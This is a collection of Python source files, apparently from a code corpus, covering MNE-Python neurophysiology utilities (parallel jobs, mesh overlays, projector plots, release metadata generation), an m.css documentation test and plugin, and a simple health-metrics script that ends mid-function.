n_jobs = _check_n_jobs(parallel.n_jobs)
if max_jobs is not None:
n_jobs = min(n_jobs, max(_ensure_int(max_jobs, 'max_jobs'), 1))
my_func = delayed(func)
if total is not None:
def parallel_progress(op_iter):
return parallel(ProgressBar(iterable=op_iter, max_value=total))
parallel_out = parallel_progress
else:
parallel_out = parallel
return parallel_out, my_func, n_jobs
# this isn't really meant to be public but it's easy enough to deprecate
@deprecated('check_n_jobs is deprecated and will be removed in 1.1, use '
'parallel_func directly')
def check_n_jobs(n_jobs, allow_cuda=False):
"""Check n_jobs in particular for negative values.
Parameters
----------
n_jobs : int
The number of jobs.
allow_cuda : bool
Allow n_jobs to be 'cuda'. Default: False.
Returns
-------
n_jobs : int
The checked number of jobs. Always positive (or 'cuda' if
applicable).
"""
types = ('int-like', None)
if allow_cuda:
types = types + ('str',)
_validate_type(n_jobs, types, 'n_jobs')
if isinstance(n_jobs, str):
# We can only be in this path if allow_cuda
_check_option('n_jobs', n_jobs, ('cuda',), extra='when str')
return 'cuda' # return 'cuda'
return _check_n_jobs(n_jobs)
def _check_n_jobs(n_jobs):
n_jobs = _ensure_int(n_jobs, 'n_jobs', must_be='an int or None')
if os.getenv('MNE_FORCE_SERIAL', '').lower() in ('true', '1') and \
n_jobs != 1:
n_jobs = 1
logger.info('... MNE_FORCE_SERIAL set. Processing in forced '
'serial mode.')
elif n_jobs <= 0:
n_cores = multiprocessing.cpu_count()
n_jobs_orig = n_jobs
n_jobs = min(n_cores + n_jobs + 1, n_cores)
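        # e.g. with 8 cores: n_jobs=-1 -> 8 jobs, n_jobs=-2 -> 7 jobs,
        # mirroring joblib's negative n_jobs convention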
        if n_jobs <= 0:
            raise ValueError(
                f'If n_jobs has a non-positive value ({n_jobs_orig}) it must '
                f'not be less than the negative of the number of CPUs '
                f'present ({n_cores})')
return n_jobs
```
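A short usage sketch of `parallel_func` (the worker function is illustrative; with ``n_jobs=1`` or without joblib installed, ``parallel`` is simply ``list`` and this degrades to a serial loop):

```python
from mne.parallel import parallel_func

def square(x):
    return x * x

parallel, p_fun, n_jobs = parallel_func(square, n_jobs=2)
results = parallel(p_fun(i) for i in range(10))
print(n_jobs, results)  # e.g. 2 [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
```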
#### File: mne/tests/test_parallel.py
```python
from contextlib import nullcontext
import multiprocessing
import os
import pytest
from mne.parallel import parallel_func
@pytest.mark.parametrize('n_jobs', [
None, 1, -1, 'loky 2', 'threading 3', 'multiprocessing 4',
])
def test_parallel_func(n_jobs):
"""Test Parallel wrapping."""
joblib = pytest.importorskip('joblib')
if os.getenv('MNE_FORCE_SERIAL', '').lower() in ('true', '1'):
        pytest.skip('MNE_FORCE_SERIAL is set; cannot test parallel execution')
def fun(x):
return x * 2
if isinstance(n_jobs, str):
backend, n_jobs = n_jobs.split()
n_jobs = want_jobs = int(n_jobs)
ctx = joblib.parallel_backend(backend, n_jobs)
n_jobs = None
else:
ctx = nullcontext()
if n_jobs is not None and n_jobs < 0:
want_jobs = multiprocessing.cpu_count() + 1 + n_jobs
else:
want_jobs = 1
with ctx:
parallel, p_fun, got_jobs = parallel_func(fun, n_jobs)
assert got_jobs == want_jobs
```
#### File: mne/viz/_3d_overlay.py
```python
from collections import OrderedDict
import numpy as np
from ..utils import logger
class _Overlay(object):
def __init__(self, scalars, colormap, rng, opacity, name):
self._scalars = scalars
self._colormap = colormap
assert rng is not None
self._rng = rng
self._opacity = opacity
self._name = name
def to_colors(self):
from ._3d import _get_cmap
from matplotlib.colors import Colormap, ListedColormap
if isinstance(self._colormap, str):
cmap = _get_cmap(self._colormap)
elif isinstance(self._colormap, Colormap):
cmap = self._colormap
else:
cmap = ListedColormap(
self._colormap / 255., name=str(type(self._colormap)))
logger.debug(
f'Color mapping {repr(self._name)} with {cmap.name} '
f'colormap and range {self._rng}')
rng = self._rng
assert rng is not None
scalars = self._norm(rng)
colors = cmap(scalars)
if self._opacity is not None:
colors[:, 3] *= self._opacity
return colors
def _norm(self, rng):
if rng[0] == rng[1]:
factor = 1 if rng[0] == 0 else 1e-6 * rng[0]
else:
factor = rng[1] - rng[0]
return (self._scalars - rng[0]) / factor
class _LayeredMesh(object):
def __init__(self, renderer, vertices, triangles, normals):
self._renderer = renderer
self._vertices = vertices
self._triangles = triangles
self._normals = normals
self._polydata = None
self._actor = None
self._is_mapped = False
self._current_colors = None
self._cached_colors = None
self._overlays = OrderedDict()
self._default_scalars = np.ones(vertices.shape)
self._default_scalars_name = 'Data'
def map(self):
kwargs = {
"color": None,
"pickable": True,
"rgba": True,
}
mesh_data = self._renderer.mesh(
x=self._vertices[:, 0],
y=self._vertices[:, 1],
z=self._vertices[:, 2],
triangles=self._triangles,
normals=self._normals,
scalars=self._default_scalars,
**kwargs
)
self._actor, self._polydata = mesh_data
self._is_mapped = True
def _compute_over(self, B, A):
assert A.ndim == B.ndim == 2
assert A.shape[1] == B.shape[1] == 4
        A_w = A[:, 3:]              # top-layer alpha (its own weight is 1)
        B_w = B[:, 3:] * (1 - A_w)  # bottom alpha attenuated by the top
C = A.copy()
C[:, :3] *= A_w
C[:, :3] += B[:, :3] * B_w
C[:, 3:] += B_w
C[:, :3] /= C[:, 3:]
return np.clip(C, 0, 1, out=C)
def _compose_overlays(self):
B = cache = None
for overlay in self._overlays.values():
A = overlay.to_colors()
if B is None:
B = A
else:
cache = B
B = self._compute_over(cache, A)
return B, cache
def add_overlay(self, scalars, colormap, rng, opacity, name):
overlay = _Overlay(
scalars=scalars,
colormap=colormap,
rng=rng,
opacity=opacity,
name=name,
)
self._overlays[name] = overlay
colors = overlay.to_colors()
if self._current_colors is None:
self._current_colors = colors
else:
# save previous colors to cache
self._cached_colors = self._current_colors
self._current_colors = self._compute_over(
self._cached_colors, colors)
# apply the texture
self._apply()
def remove_overlay(self, names):
to_update = False
if not isinstance(names, list):
names = [names]
for name in names:
if name in self._overlays:
del self._overlays[name]
to_update = True
if to_update:
self.update()
def _apply(self):
if self._current_colors is None or self._renderer is None:
return
self._renderer._set_mesh_scalars(
mesh=self._polydata,
scalars=self._current_colors,
name=self._default_scalars_name,
)
def update(self, colors=None):
if colors is not None and self._cached_colors is not None:
self._current_colors = self._compute_over(
self._cached_colors, colors)
else:
self._current_colors, self._cached_colors = \
self._compose_overlays()
self._apply()
def _clean(self):
mapper = self._actor.GetMapper()
mapper.SetLookupTable(None)
self._actor.SetMapper(None)
self._actor = None
self._polydata = None
self._renderer = None
def update_overlay(self, name, scalars=None, colormap=None,
opacity=None, rng=None):
overlay = self._overlays.get(name, None)
if overlay is None:
return
if scalars is not None:
overlay._scalars = scalars
if colormap is not None:
overlay._colormap = colormap
if opacity is not None:
overlay._opacity = opacity
if rng is not None:
overlay._rng = rng
# partial update: use cache if possible
if name == list(self._overlays.keys())[-1]:
self.update(colors=overlay.to_colors())
else: # full update
self.update()
```
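`_compute_over` above is the standard Porter-Duff "A over B" alpha compositing, computed with premultiplied colors and un-premultiplied at the end. A standalone numeric check of the same arithmetic (plain NumPy, not using the class):

```python
import numpy as np

A = np.array([[1.0, 0.0, 0.0, 0.5]])  # half-transparent red on top
B = np.array([[0.0, 0.0, 1.0, 1.0]])  # opaque blue underneath

A_w = A[:, 3:]                # top-layer alpha
B_w = B[:, 3:] * (1 - A_w)    # bottom alpha attenuated by the top layer
C = A.copy()
C[:, :3] *= A_w               # premultiply top RGB
C[:, :3] += B[:, :3] * B_w    # add attenuated bottom RGB
C[:, 3:] += B_w               # combined alpha
C[:, :3] /= C[:, 3:]          # un-premultiply
print(np.clip(C, 0, 1))       # [[0.5 0.  0.5 1. ]]: even red/blue mix, opaque
```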
#### File: mne/viz/conftest.py
```python
import pytest
import numpy as np
import os.path as op
from mne import create_info, EvokedArray, events_from_annotations, Epochs
from mne.channels import make_standard_montage
from mne.datasets.testing import data_path, _pytest_param
from mne.io import read_raw_nirx
from mne.preprocessing.nirs import optical_density, beer_lambert_law
fname_nirx = op.join(data_path(download=False),
'NIRx', 'nirscout', 'nirx_15_2_recording_w_overlap')
@pytest.fixture()
def fnirs_evoked():
"""Create an fnirs evoked structure."""
montage = make_standard_montage('biosemi16')
ch_names = montage.ch_names
ch_types = ['eeg'] * 16
info = create_info(ch_names=ch_names, sfreq=20, ch_types=ch_types)
evoked_data = np.random.randn(16, 30)
evoked = EvokedArray(evoked_data, info=info, tmin=-0.2, nave=4)
evoked.set_montage(montage)
evoked.set_channel_types({'Fp1': 'hbo', 'Fp2': 'hbo', 'F4': 'hbo',
'Fz': 'hbo'}, verbose='error')
return evoked
@pytest.fixture(params=[_pytest_param()])
def fnirs_epochs():
"""Create an fnirs epoch structure."""
raw_intensity = read_raw_nirx(fname_nirx, preload=False)
raw_od = optical_density(raw_intensity)
raw_haemo = beer_lambert_law(raw_od, ppf=6.)
evts, _ = events_from_annotations(raw_haemo, event_id={'1.0': 1})
evts_dct = {'A': 1}
tn, tx = -1, 2
epochs = Epochs(raw_haemo, evts, event_id=evts_dct, tmin=tn, tmax=tx)
return epochs
```
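These fixtures are consumed by naming them as test arguments. A hypothetical test using `fnirs_evoked` (the assertions are illustrative, derived from the fixture body above, not taken from the real test suite):

```python
def test_fnirs_evoked_shape(fnirs_evoked):
    """Sanity-check the synthetic evoked built by the fixture."""
    assert fnirs_evoked.data.shape == (16, 30)
    assert fnirs_evoked.nave == 4
```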
#### File: mne/viz/_proj.py
```python
from copy import deepcopy
import numpy as np
from .evoked import _plot_evoked
from .topomap import _plot_projs_topomap
from .utils import plt_show, _check_type_projs
from ..defaults import DEFAULTS
from ..io.pick import _picks_to_idx
from ..utils import _validate_type, warn, _pl, verbose
@verbose
def plot_projs_joint(projs, evoked, picks_trace=None, *, topomap_kwargs=None,
show=True, verbose=None):
"""Plot projectors and evoked jointly.
Parameters
----------
projs : list of Projection
The projectors to plot.
evoked : instance of Evoked
The data to plot. Typically this is the evoked instance created from
averaging the epochs used to create the projection.
%(picks_plot_projs_joint_trace)s
topomap_kwargs : dict | None
Keyword arguments to pass to :func:`mne.viz.plot_projs_topomap`.
%(show)s
%(verbose)s
Returns
-------
fig : instance of matplotlib Figure
The figure.
Notes
-----
This function creates a figure with three columns:
1. The left shows the evoked data traces before (black) and after (green)
projection.
2. The center shows the topomaps associated with each of the projectors.
3. The right again shows the data traces (black), but this time with:
1. The data projected onto each projector with a single normalization
factor (solid lines). This is useful for seeing the relative power
in each projection vector.
2. The data projected onto each projector with individual normalization
factors (dashed lines). This is useful for visualizing each time
course regardless of its power.
3. Additional data traces from ``picks_trace`` (solid yellow lines).
This is useful for visualizing the "ground truth" of the time
course, e.g. the measured EOG or ECG channel time courses.
.. versionadded:: 1.1
"""
import matplotlib.pyplot as plt
from ..evoked import Evoked
_validate_type(evoked, Evoked, 'evoked')
_validate_type(topomap_kwargs, (None, dict), 'topomap_kwargs')
projs = _check_type_projs(projs)
topomap_kwargs = dict() if topomap_kwargs is None else topomap_kwargs
if picks_trace is not None:
picks_trace = _picks_to_idx(
evoked.info, picks_trace, allow_empty=False)
info = evoked.info
ch_types = evoked.get_channel_types(unique=True, only_data_chs=True)
proj_by_type = dict() # will be set up like an enumerate key->[pi, proj]
ch_names_by_type = dict()
used = np.zeros(len(projs), int)
for ch_type in ch_types:
these_picks = _picks_to_idx(info, ch_type, allow_empty=True)
these_chs = [evoked.ch_names[pick] for pick in these_picks]
ch_names_by_type[ch_type] = these_chs
for pi, proj in enumerate(projs):
if not set(these_chs).intersection(proj['data']['col_names']):
continue
if ch_type not in proj_by_type:
proj_by_type[ch_type] = list()
proj_by_type[ch_type].append([pi, deepcopy(proj)])
used[pi] += 1
missing = (~used.astype(bool)).sum()
if missing:
warn(f'{missing} projector{_pl(missing)} had no channel names '
'present in epochs')
del projs
ch_types = list(proj_by_type) # reduce to number we actually need
# room for legend
max_proj_per_type = max(len(x) for x in proj_by_type.values())
cs_trace = 3
cs_topo = 2
n_col = max_proj_per_type * cs_topo + 2 * cs_trace
n_row = len(ch_types)
shape = (n_row, n_col)
fig = plt.figure(figsize=(n_col * 1.1 + 0.5, n_row * 1.8 + 0.5),
constrained_layout=True)
ri = 0
# pick some sufficiently distinct colors (6 per proj type, e.g., ECG,
# should be enough hopefully!)
# https://personal.sron.nl/~pault/data/colourschemes.pdf
# "Vibrant" color scheme
proj_colors = [
'#CC3311', # red
'#009988', # teal
'#0077BB', # blue
'#EE3377', # magenta
'#EE7733', # orange
'#33BBEE', # cyan
]
trace_color = '#CCBB44' # yellow
after_color, after_name = '#228833', 'green'
type_titles = DEFAULTS['titles']
last_ax = [None] * 2
first_ax = dict()
pe_kwargs = dict(show=False, draw=False)
for ch_type, these_projs in proj_by_type.items():
these_idxs, these_projs = zip(*these_projs)
ch_names = ch_names_by_type[ch_type]
idx = np.where([np.in1d(ch_names, proj['data']['col_names']).all()
for proj in these_projs])[0]
used[idx] += 1
count = len(these_projs)
for proj in these_projs:
sub_idx = [proj['data']['col_names'].index(name)
for name in ch_names]
proj['data']['data'] = proj['data']['data'][:, sub_idx]
proj['data']['col_names'] = ch_names
ba_ax = plt.subplot2grid(
shape, (ri, 0), colspan=cs_trace, fig=fig)
topo_axes = [
plt.subplot2grid(
shape, (ri, ci * cs_topo + cs_trace), colspan=cs_topo, fig=fig)
for ci in range(count)]
tr_ax = plt.subplot2grid(
shape, (ri, n_col - cs_trace), colspan=cs_trace, fig=fig)
# topomaps
_plot_projs_topomap(these_projs, info=info, show=False,
axes=topo_axes, **topomap_kwargs)
for idx, proj, ax_ in zip(these_idxs, these_projs, topo_axes):
ax_.set_title('') # could use proj['desc'] but it's long
ax_.set_xlabel(f'projs[{idx}]', fontsize='small')
unit = DEFAULTS['units'][ch_type]
# traces
this_evoked = evoked.copy().pick_channels(ch_names)
p = np.concatenate([p['data']['data'] for p in these_projs])
assert p.shape == (len(these_projs), len(this_evoked.data))
traces = np.dot(p, this_evoked.data)
traces *= np.sign(np.mean(
np.dot(this_evoked.data, traces.T), 0))[:, np.newaxis]
if picks_trace is not None:
ch_traces = evoked.data[picks_trace]
ch_traces -= np.mean(ch_traces, axis=1, keepdims=True)
ch_traces /= np.abs(ch_traces).max()
_plot_evoked(this_evoked, picks='all', axes=[tr_ax], **pe_kwargs)
for line in tr_ax.lines:
line.set(lw=0.5, zorder=3)
for t in list(tr_ax.texts):
t.remove()
scale = 0.8 * np.abs(tr_ax.get_ylim()).max()
hs, labels = list(), list()
traces /= np.abs(traces).max() # uniformly scaled
for ti, trace in enumerate(traces):
hs.append(tr_ax.plot(
this_evoked.times, trace * scale,
color=proj_colors[ti % len(proj_colors)], zorder=5)[0])
labels.append(f'projs[{these_idxs[ti]}]')
traces /= np.abs(traces).max(1, keepdims=True) # independently
for ti, trace in enumerate(traces):
tr_ax.plot(
this_evoked.times, trace * scale,
color=proj_colors[ti % len(proj_colors)], zorder=3.5,
ls='--', lw=1., alpha=0.75)
if picks_trace is not None:
trace_ch = [evoked.ch_names[pick] for pick in picks_trace]
if len(picks_trace) == 1:
trace_ch = trace_ch[0]
hs.append(tr_ax.plot(
this_evoked.times, ch_traces.T * scale, color=trace_color,
lw=3, zorder=4, alpha=0.75)[0])
labels.append(str(trace_ch))
tr_ax.set(title='', xlabel='', ylabel='')
# This will steal space from the subplots in a constrained layout
# https://matplotlib.org/3.5.0/tutorials/intermediate/constrainedlayout_guide.html#legends # noqa: E501
tr_ax.legend(
hs, labels, loc='center left', borderaxespad=0.05,
bbox_to_anchor=[1.05, 0.5])
last_ax[1] = tr_ax
key = 'Projected time course'
if key not in first_ax:
first_ax[key] = tr_ax
# Before and after traces
_plot_evoked(this_evoked, picks='all', axes=[ba_ax], **pe_kwargs)
for line in ba_ax.lines:
line.set(lw=0.5, zorder=3)
loff = len(ba_ax.lines)
this_proj_evoked = this_evoked.copy().add_proj(these_projs)
# with meg='combined' any existing mag projectors (those already part
# of evoked before we add_proj above) will have greatly
# reduced power, so we ignore the warning about this issue
this_proj_evoked.apply_proj(verbose='error')
_plot_evoked(this_proj_evoked, picks='all', axes=[ba_ax], **pe_kwargs)
for line in ba_ax.lines[loff:]:
line.set(lw=0.5, zorder=4, color=after_color)
for t in list(ba_ax.texts):
t.remove()
ba_ax.set(title='', xlabel='')
ba_ax.set(ylabel=f'{type_titles[ch_type]}\n{unit}')
last_ax[0] = ba_ax
key = f'Before (black) and after ({after_name})'
if key not in first_ax:
first_ax[key] = ba_ax
ri += 1
for ax in last_ax:
ax.set(xlabel='Time (sec)')
for title, ax in first_ax.items():
ax.set_title(title, fontsize='medium')
plt_show(show)
return fig
```
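A hedged end-to-end sketch of how `plot_projs_joint` is typically reached (``raw_path`` and the EOG channel name are placeholders; `compute_proj_eog` is one standard way to obtain projectors):

```python
import mne

raw = mne.io.read_raw_fif(raw_path, preload=True)  # raw_path: placeholder
projs, _ = mne.preprocessing.compute_proj_eog(raw, n_grad=1, n_mag=1, n_eeg=1)
eog_evoked = mne.preprocessing.create_eog_epochs(raw).average()
fig = mne.viz.plot_projs_joint(projs, eog_evoked, picks_trace='EOG 061')
```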
#### File: mne-python/tools/generate_codemeta.py
```python
import os
import subprocess
from datetime import date
from mne import __version__ as release_version
# NOTE: ../codemeta.json and ../citation.cff should not be continuously
# updated. Run this script only at release time.
package_name = 'MNE-Python'
hard_dependencies = ('numpy', 'scipy')
release_date = str(date.today())
commit = subprocess.run(['git', 'log', '-1', '--pretty=%H'],
capture_output=True, text=True).stdout.strip()
# KEYWORDS
keywords = (
'MEG',
'magnetoencephalography',
'EEG',
'electroencephalography',
'fNIRS',
'functional near-infrared spectroscopy',
'iEEG',
'intracranial EEG',
'eCoG',
'electrocorticography',
'DBS',
'deep brain stimulation'
)
# add to these as necessary
compound_surnames = (
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'de <NAME>orre',
'de Montalivet',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
)
def parse_name(name):
"""Split name blobs from `git shortlog -nse` into first/last/email."""
# remove commit count
_, name_and_email = name.strip().split('\t')
name, email = name_and_email.split(' <')
email = email.strip('>')
email = '' if 'noreply' in email else email # ignore "noreply" emails
name = ' '.join(name.split('.')) # remove periods from initials
# handle compound surnames
for compound_surname in compound_surnames:
if name.endswith(compound_surname):
ix = name.index(compound_surname)
first = name[:ix].strip()
last = compound_surname
return (first, last, email)
# handle non-compound surnames
name_elements = name.split()
if len(name_elements) == 1: # mononyms / usernames
first = ''
last = name
else:
first = ' '.join(name_elements[:-1])
last = name_elements[-1]
return (first, last, email)
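# Example (hypothetical shortlog line):
#   parse_name('    42\tJane Q. Public <jane@example.com>')
# returns ('Jane Q', 'Public', 'jane@example.com'): the commit count is
# dropped, periods in initials are removed, and "noreply" addresses come
# back as an empty email string.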
# MAKE SURE THE RELEASE STRING IS PROPERLY FORMATTED
msg = f'version string must be X.Y.Z (all integers), got {release_version}'
try:
    split_version = list(map(int, release_version.split('.')))
except ValueError:
    raise ValueError(msg) from None
assert len(split_version) == 3, msg
# RUN GIT SHORTLOG TO GET ALL AUTHORS, SORTED BY NUMBER OF COMMITS
args = ['git', 'shortlog', '-nse']
result = subprocess.run(args, capture_output=True, text=True)
lines = result.stdout.strip().split('\n')
all_names = [parse_name(line) for line in lines]
# CONSTRUCT JSON AUTHORS LIST
json_authors = [f'''{{
"@type":"Person",
"email":"{email}",
"givenName":"{first}",
"familyName": "{last}"
}}''' for (first, last, email) in all_names]
# GET OUR DEPENDENCY VERSIONS
with open(os.path.join('..', 'setup.py'), 'r') as fid:
for line in fid:
if line.strip().startswith('python_requires='):
version = line.strip().split('=', maxsplit=1)[1].strip("'\",")
dependencies = [f'python{version}']
break
with open(os.path.join('..', 'requirements.txt'), 'r') as fid:
for line in fid:
req = line.strip()
for hard_dep in hard_dependencies:
if req.startswith(hard_dep):
dependencies.append(req)
# these must be done outside the boilerplate (no \n allowed in f-strings):
json_authors = ',\n '.join(json_authors)
dependencies = '",\n "'.join(dependencies)
json_keywords = '",\n "'.join(keywords)
# ASSEMBLE COMPLETE JSON
codemeta_boilerplate = f'''{{
"@context": "https://doi.org/10.5063/schema/codemeta-2.0",
"@type": "SoftwareSourceCode",
"license": "https://spdx.org/licenses/BSD-3-Clause",
"codeRepository": "git+https://github.com/mne-tools/mne-python.git",
"dateCreated": "2010-12-26",
"datePublished": "2014-08-04",
"dateModified": "{release_date}",
"downloadUrl": "https://github.com/mne-tools/mne-python/archive/v{release_version}.zip",
"issueTracker": "https://github.com/mne-tools/mne-python/issues",
"name": "{package_name}",
"version": "{release_version}",
"description": "{package_name} is an open-source Python package for exploring, visualizing, and analyzing human neurophysiological data. It provides methods for data input/output, preprocessing, visualization, source estimation, time-frequency analysis, connectivity analysis, machine learning, and statistics.",
"applicationCategory": "Neuroscience",
"developmentStatus": "active",
"referencePublication": "https://doi.org/10.3389/fnins.2013.00267",
"keywords": [
"{json_keywords}"
],
"programmingLanguage": [
"Python"
],
"operatingSystem": [
"Linux",
"Windows",
"macOS"
],
"softwareRequirements": [
"{dependencies}"
],
"author": [
{json_authors}
]
}}
''' # noqa E501
# WRITE TO FILE
with open(os.path.join('..', 'codemeta.json'), 'w') as codemeta_file:
codemeta_file.write(codemeta_boilerplate)
# # # # # # # # # # # # # # #
# GENERATE CITATION.CFF TOO #
# # # # # # # # # # # # # # #
message = ('If you use this software, please cite both the software itself, '
'and the paper listed in the preferred-citation field.')
# in CFF, multi-word keywords need to be wrapped in quotes
cff_keywords = (f'"{kw}"' if ' ' in kw else kw for kw in keywords)
# make into a bulleted list
cff_keywords = '\n'.join(f' - {kw}' for kw in cff_keywords)
# TODO: someday would be nice to include ORCiD identifiers too
cff_authors = [f' - family-names: {last}\n given-names: {first}'
if first else
f' - name: {last}'
for (first, last, _) in all_names]
cff_authors = '\n'.join(cff_authors)
# this ↓↓↓ is the meta-DOI that always resolves to the latest release
zenodo_doi = '10.5281/zenodo.592483'
# ASSEMBLE THE CFF STRING
cff_boilerplate = f'''\
cff-version: 1.2.0
title: "{package_name}"
message: "{message}"
version: {release_version}
date-released: "{release_date}"
commit: {commit}
doi: {zenodo_doi}
keywords:
{cff_keywords}
authors:
{cff_authors}
preferred-citation:
title: "MEG and EEG Data Analysis with MNE-Python"
journal: "Frontiers in Neuroscience"
type: article
year: 2013
volume: 7
issue: 267
start: 1
end: 13
doi: 10.3389/fnins.2013.00267
authors:
- family-names: Gramfort
given-names: Alexandre
- family-names: Luessi
given-names: Martin
- family-names: Larson
given-names: Eric
- family-names: Engemann
      given-names: Denis A.
- family-names: Strohmeier
given-names: Daniel
- family-names: Brodbeck
given-names: Christian
- family-names: Goj
given-names: Roman
- family-names: Jas
given-names: Mainak
- family-names: Brooks
given-names: Teon
- family-names: Parkkonen
given-names: Lauri
- family-names: Hämäläinen
      given-names: Matti S.
'''
# WRITE TO FILE
with open(os.path.join('..', 'CITATION.cff'), 'w') as cff_file:
cff_file.write(cff_boilerplate)
```
{
"source": "0rganizers/m.css",
"score": 2
}
#### File: documentation/test_python/test_link_formatting.py
```python
import os
import unittest
from typing import List, Tuple
from . import BaseInspectTestCase
from python import EntryType, default_id_formatter
from _search import searchdata_format_version
def custom_url_formatter(type: EntryType, path: List[str]) -> Tuple[str, str]:
if type == EntryType.CLASS:
filename = 'c.' + '.'.join(path) + '.html'
elif type == EntryType.MODULE:
filename = 'm.' + '.'.join(path) + '.html'
elif type == EntryType.PAGE:
filename = 'p.' + '.'.join(path) + '.html'
elif type == EntryType.SPECIAL:
filename = 's.' + '.'.join(path) + '.html'
elif type == EntryType.STATIC:
assert len(path) == 1
url = os.path.basename(path[0])
# Encode version information into the search driver
if url == 'search.js':
url = 'search-v{}.js'.format(searchdata_format_version)
# Everything except the search data (which don't exist yet) should be
# absolute
if url != 'absolutesearchdata-v{}.bin'.format(searchdata_format_version):
assert os.path.isabs(path[0]) and os.path.exists(path[0]), path[0]
filename = 't.' + url
else: assert False
return filename, filename + "#this-is-an-url"
def custom_id_formatter(type: EntryType, path: List[str]) -> str:
if type == EntryType.FUNCTION:
return 'f-' + '-'.join(path)
if type == EntryType.OVERLOADED_FUNCTION:
# Reuse the original hasher so we can test its behavior
return 'o-' + default_id_formatter(type, path)
if type == EntryType.PROPERTY:
return 'p-' + '-'.join(path)
if type == EntryType.ENUM:
return 'e-' + '-'.join(path)
if type == EntryType.ENUM_VALUE:
return 'v-' + '-'.join(path)
if type == EntryType.DATA:
return 'd-' + '-'.join(path)
assert False
class LinkFormatting(BaseInspectTestCase):
def test(self):
self.run_python({
'INPUT_PAGES': ['page.rst'],
'URL_FORMATTER': custom_url_formatter,
'ID_FORMATTER': custom_id_formatter,
'PLUGINS': ['m.images'],
'LINKS_NAVBAR1': [
('Pages', 'pages', []),
('Modules', 'modules', []),
('Classes', 'classes', [])],
'LINKS_NAVBAR2': [('A page', 'page', []),
('A module', 'link_formatting', []),
('The class', ['link_formatting', 'Class'], [])],
'FAVICON': 'favicon-light.png',
'SEARCH_DISABLED': False, # to test search link formatting, too
'SEARCH_HELP': 'blub?',
'SEARCH_DOWNLOAD_BINARY': 'absolutesearchdata-v{}.bin'.format(searchdata_format_version),
'PYBIND11_COMPATIBILITY': True
})
self.assertEqual(*self.actual_expected_contents('m.link_formatting.html'))
self.assertEqual(*self.actual_expected_contents('m.link_formatting.sub.html'))
self.assertEqual(*self.actual_expected_contents('c.link_formatting.Class.html'))
self.assertEqual(*self.actual_expected_contents('c.link_formatting.Class.Sub.html'))
self.assertEqual(*self.actual_expected_contents('p.page.html'))
self.assertEqual(*self.actual_expected_contents('s.classes.html'))
self.assertEqual(*self.actual_expected_contents('s.modules.html'))
self.assertEqual(*self.actual_expected_contents('s.pages.html'))
# There's nothing inside s.index.html that wouldn't be already covered
# by others
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/s.index.html')))
# Verify pybind11 overloaded function hashing as well
self.assertEqual(*self.actual_expected_contents('m.link_formatting.pybind.html'))
self.assertEqual(*self.actual_expected_contents('c.link_formatting.pybind.Foo.html'))
# Static data
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.favicon-light.png')))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.m-dark+documentation.compiled.css')))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.search-v{}.js'.format(searchdata_format_version))))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.absolutesearchdata-v{}.bin'.format(searchdata_format_version))))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.tiny.png')))
```
#### File: plugins/m/abbr.py
```python
import re
from docutils import nodes, utils
from docutils.parsers import rst
from docutils.parsers.rst.roles import set_classes
# to avoid dependencies, link_regexp and parse_link() are shared by m.abbr,
# m.gh, m.gl, m.link and m.vk
link_regexp = re.compile(r'(?P<title>.*) <(?P<link>.+)>')
def parse_link(text):
link = utils.unescape(text)
m = link_regexp.match(link)
if m: return m.group('title', 'link')
return None, link
def abbr(name, rawtext, text, lineno, inliner, options={}, content=[]):
abbr, title = parse_link(text)
set_classes(options)
if not abbr:
return [nodes.abbreviation(title, title, **options)], []
return [nodes.abbreviation(abbr, abbr, title=title, **options)], []
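# Example reST usage (illustrative document text): the part in <...> becomes
# the title attribute, the part before it becomes the abbreviation text:
#   :abbr:`CSS <Cascading Style Sheets>`
# Without the <...> form, the whole text is rendered as a plain abbreviation.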
def register_mcss(**kwargs):
rst.roles.register_local_role('abbr', abbr)
register = register_mcss # for Pelican
``` |
{
"source": "0rion5/PyHealth",
"score": 3
} |
#### File: 0rion5/PyHealth/PyHealth.py
```python
class PyHealth:
"""This class initializes 5 methods used for calculating health and fitness metrics"""
def __init__(self):
self.data= []
def basal_metabolic_rate():
import BasalMetabolicRate
BasalMetabolicRate.setup()
BasalMetabolicRate.main()
main_menu= setup()
return main_menu
def body_mass_index():
import BodyMassIndex
BMI= BodyMassIndex.main()
return round(BMI, 2)
def one_rep_max():
import OneRepMax
upper_rm= OneRepMax.OneRepMax.upper(int(input("Upper Body 4-6 Rep Max in kg: ")))
lower_rm= OneRepMax.OneRepMax.lower(int(input("Lower Body 4-6 Rep Max in kg: ")))
print("\nYour recommended upper is: {}\nYour recommended lower is: {}\n".format(round(upper_rm),round(lower_rm)))
return [upper_rm, lower_rm]
def target_heart_rate():
import TargetHeartRate
return TargetHeartRate.main()
def vo2max():
"""Gets vo2 max class from module and returns estimated vo2max """
import Vo2Max
age= int(input("Enter Age: "))
gender = input("Gender m/f: ")
        if gender[:1].lower() == 'm':
            gender = 1
        elif gender[:1].lower() == 'f':
            gender = 0
weight = float(input("weight in lbs: "))
walk_time_mins = int(input("Enter walk time in mins: "))
heart_rate = int(input("Heart rate: "))
VO2max= Vo2Max.Vo2Max.vo2max(age, gender,weight,walk_time_mins, heart_rate)
return VO2max
#%%
def menu():
while True:
PyHealth_dict= {
1 : "Basal Metabolic Rate" ,
2 : "Body Mass Index" ,
3 : "One Rep Max" ,
4 : "Target Heart Rate" ,
5 : "Vo2 Max"
}
print("\nPyHealth Menu Options: ")
print("(1) Basal Metabolic Rate\n(2) Body Mass Index\n(3) One Rep Max\n(4) Target Heart Rate\n(5) VO2 Max")
        option = int(input("Choose an option 1 to 5: "))
        # Direct dictionary lookup; the while loop re-prompts on invalid input.
        if option in PyHealth_dict:
            return PyHealth_dict[option]
#%%
def yes_no(user_input):
option= lambda x: x[0:1].lower()
while True:
choice= option(user_input)
if choice=='y':
# Return yes
return 'yes'
elif choice=='n':
# Return no
return 'no'
else:
# Return yes_no() function
return yes_no(input("Continue? Y/n: "))
#%%
def main():
return setup()
#%%
def setup():
menu_option= menu()
print("\nYou've chosen "+str(menu_option))
if yes_no(input("Would you like to continue? y/n: "))=="yes":
runProgram = True
while runProgram:
try:
